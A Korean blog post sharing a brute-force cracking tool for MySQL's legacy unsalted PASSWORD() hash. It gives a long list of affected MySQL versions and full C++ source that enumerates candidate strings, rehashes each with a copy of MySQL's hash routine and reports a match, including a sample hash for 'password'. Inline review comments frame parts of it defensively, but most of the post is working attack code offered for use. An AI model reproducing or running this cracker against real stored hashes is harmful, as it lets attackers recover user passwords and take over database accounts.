Database

Mysql Password() 크랙툴


MySQL PASSWORD() 함수의 해시가 브루트포스 공격으로 크랙된다는 건
좀 오래전에 발표된 내용인데요..


Mysql Password() 크랙툴
MFC로 제작하였습니다.

외국넘이 C언어로 만들어 놓은거 MFC로 포팅작업하였습니다.
(찬사는 그 외국넘한테 보내시길...넘~ 넘~ 해서 죄송. 존경의 의미임)

CPU를 100% 할당하여 크랙을 시작할 겁니다. 참고 바랍니다.

빠른 속도를 위해 좀더 업그레이드할 예정. 특정 부분 어셈처리..

6자리까지는 무난히 푸는데.. 그 이후로는 시간이 상당히 오래 걸림



/////////////////////////////////////////////////
vulnerable
MySQL AB MySQL 3.20 .x
MySQL AB MySQL 3.20.32 a
MySQL AB MySQL 3.21 .x
MySQL AB MySQL 3.22 .x
MySQL AB MySQL 3.22.26
MySQL AB MySQL 3.22.27
MySQL AB MySQL 3.22.28
MySQL AB MySQL 3.22.29
MySQL AB MySQL 3.22.30
MySQL AB MySQL 3.22.32
  + Debian Linux 2.2 68k
  + Debian Linux 2.2 alpha
  + Debian Linux 2.2 arm
  + Debian Linux 2.2 IA-32
  + Debian Linux 2.2 powerpc
  + Debian Linux 2.2 sparc
MySQL AB MySQL 3.23 .x
MySQL AB MySQL 3.23.2
MySQL AB MySQL 3.23.3
  - FreeBSD FreeBSD 4.0
  - FreeBSD FreeBSD 5.0
MySQL AB MySQL 3.23.4
MySQL AB MySQL 3.23.5
  + Trustix Secure Linux 1.5
MySQL AB MySQL 3.23.8
MySQL AB MySQL 3.23.9
MySQL AB MySQL 3.23.10
MySQL AB MySQL 3.23.22
  + RedHat Linux 7.0
  + RedHat Linux 7.0 alpha
  + RedHat Linux 7.0 sparc
MySQL AB MySQL 3.23.23
MySQL AB MySQL 3.23.24
MySQL AB MySQL 3.23.25
MySQL AB MySQL 3.23.26
  + RedHat Linux 7.1
  + RedHat Linux 7.1 alpha
  + RedHat Linux 7.1 ia64
MySQL AB MySQL 3.23.27
MySQL AB MySQL 3.23.28 gamma
MySQL AB MySQL 3.23.28
MySQL AB MySQL 3.23.29
MySQL AB MySQL 3.23.30
MySQL AB MySQL 3.23.31
  + MandrakeSoft Linux Mandrake 7.2
  + MandrakeSoft Single Network Firewall 7.2
MySQL AB MySQL 3.23.32
  + Wirex Immunix OS 7+
MySQL AB MySQL 3.23.33
  + S.u.S.E. Linux 7.1
  + S.u.S.E. Linux 7.1 alpha
  + S.u.S.E. Linux 7.1 ppc
  + S.u.S.E. Linux 7.1 sparc
  + S.u.S.E. Linux 7.1 x86
MySQL AB MySQL 3.23.34
  - Debian Linux 2.2
  - Debian Linux 2.2 68k
  - Debian Linux 2.2 alpha
  - Debian Linux 2.2 arm
  - Debian Linux 2.2 powerpc
  - Debian Linux 2.2 sparc
  - FreeBSD FreeBSD 3.5.1
  - FreeBSD FreeBSD 4.2
  - HP HP-UX 11.0
  - HP HP-UX 11.11
  - IBM AIX 4.3.2
  - IBM AIX 4.3.3
  - MandrakeSoft Linux Mandrake 7.0
  - MandrakeSoft Linux Mandrake 7.1
  - MandrakeSoft Linux Mandrake 7.2
  - OpenBSD OpenBSD 2.6
  - OpenBSD OpenBSD 2.7
  - OpenBSD OpenBSD 2.8
  - RedHat Linux 5.2 alpha
  - RedHat Linux 5.2 i386
  - RedHat Linux 5.2 sparc
  - RedHat Linux 6.2 alpha
  - RedHat Linux 6.2 i386
  - RedHat Linux 6.2 sparc
  - RedHat Linux 7.0 alpha
  - RedHat Linux 7.0 i386
  - S.u.S.E. Linux 6.4
  - S.u.S.E. Linux 7.0
  - S.u.S.E. Linux 7.1
  - Sun Solaris 2.6
  - Sun Solaris 2.6 _x86
  - Sun Solaris 7.0
  - Sun Solaris 7.0 _x86
  - Sun Solaris 8.0
  - Sun Solaris 8.0 _x86
MySQL AB MySQL 3.23.36
  + Conectiva Linux 6.0
  + Conectiva Linux 7.0
  + EnGarde Secure Linux 1.0.1
  + MandrakeSoft Linux Mandrake 8.0
  + MandrakeSoft Linux Mandrake 8.0 ppc
  + RedHat Linux 7.1
  + RedHat Linux 7.1 i386
  + RedHat Linux 7.1 i586
  + RedHat Linux 7.1 i686
  + RedHat Linux 7.1 ia64
MySQL AB MySQL 3.23.37
  + S.u.S.E. Linux 7.2
  + S.u.S.E. Linux 7.2 i386
MySQL AB MySQL 3.23.38
MySQL AB MySQL 3.23.39
MySQL AB MySQL 3.23.40
MySQL AB MySQL 3.23.41
  + MandrakeSoft Linux Mandrake 8.1
  + MandrakeSoft Linux Mandrake 8.1 ia64
  + RedHat Linux 7.2
  + RedHat Linux 7.2 alpha
  + RedHat Linux 7.2 ia64
MySQL AB MySQL 3.23.42
MySQL AB MySQL 3.23.43
MySQL AB MySQL 3.23.44
  + S.u.S.E. Linux 7.3
  + S.u.S.E. Linux 7.3 i386
  + S.u.S.E. Linux 7.3 ppc
  + S.u.S.E. Linux 7.3 sparc
MySQL AB MySQL 3.23.45
MySQL AB MySQL 3.23.46
  + Conectiva Linux 8.0
  + OpenPKG OpenPKG 1.0
MySQL AB MySQL 3.23.47
  + MandrakeSoft Linux Mandrake 8.2
  + MandrakeSoft Linux Mandrake 8.2 ppc
MySQL AB MySQL 3.23.48
  + S.u.S.E. Linux 8.0
  + S.u.S.E. Linux 8.0 i386
MySQL AB MySQL 3.23.49
  + Debian Linux 3.0 alpha
  + Debian Linux 3.0 arm
  + Debian Linux 3.0 hppa
  + Debian Linux 3.0 ia-32
  + Debian Linux 3.0 ia-64
  + Debian Linux 3.0 m68k
  + Debian Linux 3.0 mips
  + Debian Linux 3.0 mipsel
  + Debian Linux 3.0 ppc
  + Debian Linux 3.0 s/390
  + Debian Linux 3.0 sparc
  + RedHat Linux 7.3
  + RedHat Linux 7.3 i386
  + RedHat Linux 7.3 i686
MySQL AB MySQL 3.23.50
MySQL AB MySQL 3.23.51
MySQL AB MySQL 3.23.52
  + MandrakeSoft Linux Mandrake 9.0
  + OpenPKG OpenPKG 1.1
  + RedHat Linux 8.0
  + RedHat Linux 8.0 i386
  + S.u.S.E. Linux 8.1
  + Trustix Secure Linux 1.5
MySQL AB MySQL 3.23.53 a
MySQL AB MySQL 3.23.53
  + OpenPKG OpenPKG Current
  + Sun Cobalt Qube 3
MySQL AB MySQL 3.23.54 a
  + OpenPKG OpenPKG Current
  + OpenPKG OpenPKG 1.2
  + RedHat Linux 9.0 i386
MySQL AB MySQL 3.23.54
  + Trustix Secure Linux 1.5
MySQL AB MySQL 3.23.55
  + OpenPKG OpenPKG Current
  + Trustix Secure Linux 1.5
MySQL AB MySQL 3.23.56
MySQL AB MySQL 4.0 .0
MySQL AB MySQL 4.0.1
MySQL AB MySQL 4.0.2
MySQL AB MySQL 4.0.3
MySQL AB MySQL 4.0.5 a
MySQL AB MySQL 4.0.7 -gamma
MySQL AB MySQL 4.0.8 -gamma
MySQL AB MySQL 4.0.9 -gamma
MySQL AB MySQL 4.0.11 -gamma
MySQL AB MySQL 4.1 .0-alpha
MySQL AB MySQL 4.1 .0-0

not vulnerable: (none listed)
 

--------------------------------------------------------------
#include <iostream>
#include <stdio.h>
#include <math.h>
#include <stdlib.h>
#include <string.h> // memset
#include <unistd.h> // usleep

using namespace std;

// State of the small pseudo-random generator that randominit(),
// old_randominit() and rnd() operate on.
struct rand_struct {
    unsigned long seed1;      // first seed, kept below max_value by the functions that write it
    unsigned long seed2;      // second seed
    unsigned long max_value;  // modulus applied to the seeds
    double max_value_dbl;     // max_value stored as a double; rnd() divides by it
};

// Forward declaration: writes the hex text of the hash of the second argument
// into the buffer given as the first argument (definition further down).
void make_scrambled_password(char *,const char *);
// Forward declaration: defined further down; neither brute() nor main() in
// this listing calls it.
char *scramble(char *,const char *,const char *, int);

// Enumerates candidate strings, hashes each one with make_scrambled_password()
// and compares the hex result with `password` (the hash text passed in by
// main()). Prints the candidate on a match, or "No match found" once the
// candidate index exceeds `width`; returns 0 in both cases.
//
// NOTE(review): what this demonstrates for defenders is that the hash defined
// further down mixes in no salt and costs only a few arithmetic operations per
// input byte, so a leaked hash can be tested offline at very high rates.
// Protection therefore has to come from restricting read access to the stored
// hashes and from moving accounts off this 16-hex-digit format.
int brute(const char *password) {
// Tune stuff here, change min / max for the char range to crack and width for max password width.
// min/max are character codes (32 = ' ', 122 = 'z'); pos is the index being
// advanced, max_pos the highest index used so far.
unsigned int min=32,max=122,pos=0,width=11,max_pos=0;
unsigned char data[255];
// Number of candidates tried; only used for the progress output below.
register unsigned long long loops=0;
// NOTE(review): allocated with new[] and never released in this function
// (no delete[] on either return path).
char *encrypted_password = new char[255];
memset(encrypted_password, 0, 255);
// Every byte of the candidate buffer starts at the lowest character code.
memset((char*)&data, min, 255);
// width is only set to 0 immediately before a return, so the loop is left
// exclusively through the return statements inside it.
while(width) {
loops++;
if(data[pos] != max) {
// Common case: advance the character at the current position.
data[pos]++;
} else {
// Current position is exhausted: find the next position upward that can
// still be advanced.
// NOTE(review): the bound is `max` (a character code, 122), not `width` or
// the array length; indices stay below 255, so the access is in bounds.
for(register int i=pos; i<max; i++) {
if(data[i] != max) {
data[i]++;
pos=i;
break;
}
}

if(pos>max_pos)
max_pos=pos;

// Walk back down from pos-1, resetting exhausted positions to `min` and
// choosing the position to advance next.
// NOTE(review): pos is unsigned, so pos-1 wraps when pos is 0 before being
// converted to int; presumably that yields -1 and the loop is skipped.
for(register int i=pos-1; i >= 0; i--) {
if(i==0 && data[i] == max) {
data[i] = min;
pos = 0;
break;
}
if(data[i] != max || i==0) {
pos = i;
break;
}
data[i] = min;
}
}

// Give up once the highest index in use passes `width`. The candidate is
// max_pos+1 bytes long, so this compares an index, not a length.
if(max_pos>width) {
cout<<"No match found"<<endl;
width=0;
return(0);
}
// Temporarily NUL-terminate the candidate so it can be hashed and printed.
data[max_pos+1] = 0;
make_scrambled_password(encrypted_password,(const char*)data);
// Exact text comparison against the hash string supplied by the caller.
if(!strcmp(encrypted_password,password)) {
cout<<"MATCH ["<<data<<"] ["<<encrypted_password<<"]==["<<password<<"]"<<endl;
return(0);
}
// Undo the terminator so the byte is a normal candidate character again.
data[max_pos+1] = min;
// Progress line every 500000 candidates: counter, candidate bytes in hex,
// then the candidate as text.
if((loops%500000)==0) {
cout<<"[ "<<dec<<loops<<" ]";
for(int i=0; i<=max_pos; i++) {
cout<<" 0x"<<hex<<(int)data[i];
}
data[max_pos+1] = 0;
cout<<" ("<<data<<")";
data[max_pos+1] = min;
cout<<endl;
}
}
// NOTE(review): no return statement here although the function returns int;
// see the comment on the while loop for why this point is not reached.
}

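// Entry point: expects exactly one argument, the hash text to test, and hands
// it to brute(). With any other argument count it prints a usage message to
// stderr and exits with status 0.
int main(int argc, char* argv[]) {
    if (argc != 2) {
        // The listing had "\\n" here, which prints a literal backslash and 'n'
        // instead of ending the line; use real newlines.
        fprintf(stderr,
                "usage : %s [ENCRYPTED MYSQL PASSWORD]\n"
                "example , 5d2e19393cc5ef67 is encrypted value 'password' : %s 5d2e19393cc5ef67\n",
                argv[0], argv[0]);
        return(0);
    }
    brute(argv[1]);
    return 0;
}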
///////////////////////////////////////////////////////////////////////////////////////////////////////////
//
// thx mysql source ^_^
//
// Initialises the generator state with modulus 0x3FFFFFFF and stores both
// seeds reduced modulo that value.
void randominit(struct rand_struct *rand_st,ulong seed1, ulong seed2) {
    const unsigned long modulus = 0x3FFFFFFFL;

    rand_st->max_value = modulus;
    rand_st->max_value_dbl = (double) modulus;
    rand_st->seed1 = seed1 % modulus;
    rand_st->seed2 = seed2 % modulus;
}
// Single-seed variant of randominit(): modulus 0x01FFFFFF, seed1 is the input
// reduced modulo it and seed2 is half of that reduced value.
static void old_randominit(struct rand_struct *rand_st,ulong seed1) {
    const unsigned long modulus = 0x01FFFFFFL;
    const unsigned long reduced = seed1 % modulus;

    rand_st->max_value = modulus;
    rand_st->max_value_dbl = (double) modulus;
    rand_st->seed1 = reduced;
    rand_st->seed2 = reduced / 2;
}
// Advances the generator one step and returns seed1 divided by max_value_dbl.
// seed2 is derived from the already-updated seed1, so the order matters.
double rnd(struct rand_struct *rand_st) {
    const unsigned long modulus = rand_st->max_value;
    const unsigned long next1 = (rand_st->seed1 * 3 + rand_st->seed2) % modulus;
    const unsigned long next2 = (next1 + rand_st->seed2 + 33) % modulus;

    rand_st->seed1 = next1;
    rand_st->seed2 = next2;
    return ((double) next1) / rand_st->max_value_dbl;
}
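// Computes the two halves of the password hash used by this listing and stores
// them in result[0] and result[1], each masked to 31 bits.
//
// result   - output array with room for two values
// password - NUL-terminated input; spaces and tabs are skipped and do not
//            affect the result
//
// The only input is the password itself (no salt or per-account value), so
// equal passwords always give equal hashes.
//
// Changes from the listing: the tab test used '\\t' (a two-character constant
// that never equals a single char), so tabs were hashed instead of skipped;
// and the non-standard `ulong` typedef is spelled `unsigned long`, matching
// the field types of struct rand_struct.
inline void hash_password(unsigned long *result, const char *password) {
    unsigned long nr = 1345345333L;
    unsigned long add = 7;
    unsigned long nr2 = 0x12345671L;
    const unsigned long mask31 = (1UL << 31) - 1UL;  /* Don't use sign bit (str2int) */

    for (const char *p = password; *p != '\0'; p++) {
        if (*p == ' ' || *p == '\t') {
            continue;
        }
        // Go through unsigned char so bytes >= 0x80 are not sign-extended.
        const unsigned long ch = (unsigned long) (unsigned char) *p;
        nr ^= (((nr & 63) + add) * ch) + (nr << 8);
        nr2 += (nr2 << 8) ^ nr;
        add += ch;
    }

    result[0] = nr & mask31;
    result[1] = nr2 & mask31;
}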
// Writes the hash of `password` into `to` as two zero-padded lowercase hex
// fields ("%08lx%08lx"). hash_password() masks each half to 31 bits, so the
// text is 16 characters; `to` must have room for those plus the terminating
// NUL. No length is passed in, so the caller is responsible for the size.
inline void make_scrambled_password(char *to,const char *password) {
    ulong halves[2];

    hash_password(halves, password);

    const ulong first_half = halves[0];
    const ulong second_half = halves[1];
    sprintf(to, "%08lx%08lx", first_half, second_half);
}
// Maps a digit character to its value: '0'-'9' -> 0-9, 'A'-'Z' -> 10-35,
// anything else is treated as a lowercase letter ('a' -> 10). The input is not
// validated, so other characters produce whatever X-'a'+10 converts to.
static inline uint char_val(char X) {
    int value;

    if (X >= '0' && X <= '9') {
        value = X - '0';
    } else if (X >= 'A' && X <= 'Z') {
        value = X - 'A' + 10;
    } else {
        value = X - 'a' + 10;
    }
    return (uint) value;
}
// Fills `to` with one generated byte per byte of `message`, using a generator
// seeded from the hashes of `password` and `message`, then NUL-terminates it.
//
// to       - output buffer; needs room for strlen(message)+1 bytes (no size
//            is passed in, so the caller must guarantee it)
// message  - NUL-terminated input; only read when password is non-empty
// password - when NULL or empty, only the terminating NUL is written
// old_ver  - non-zero selects old_randominit() and skips the final XOR pass
//
// Returns a pointer to the terminating NUL, i.e. the end of the output rather
// than its start.
char *scramble(char *to,const char *message,const char *password, int old_ver) {
    if (password && password[0]) {
        struct rand_struct rand_st;
        ulong hash_pass[2];
        ulong hash_message[2];
        char *const first = to;

        hash_password(hash_pass, password);
        hash_password(hash_message, message);

        if (old_ver) {
            old_randominit(&rand_st, hash_pass[0] ^ hash_message[0]);
        } else {
            randominit(&rand_st, hash_pass[0] ^ hash_message[0],
                       hash_pass[1] ^ hash_message[1]);
        }

        // One output byte in the range 64..94 for every message byte.
        for (; *message; message++) {
            *to++ = (char) (floor(rnd(&rand_st) * 31) + 64);
        }

        if (!old_ver) {
            // The newer variant XORs every output byte with one more generated value.
            const char extra = (char) (floor(rnd(&rand_st) * 31));
            for (char *cursor = first; cursor != to; cursor++) {
                *cursor ^= extra;
            }
        }
    }

    *to = 0;
    return to;
}
 
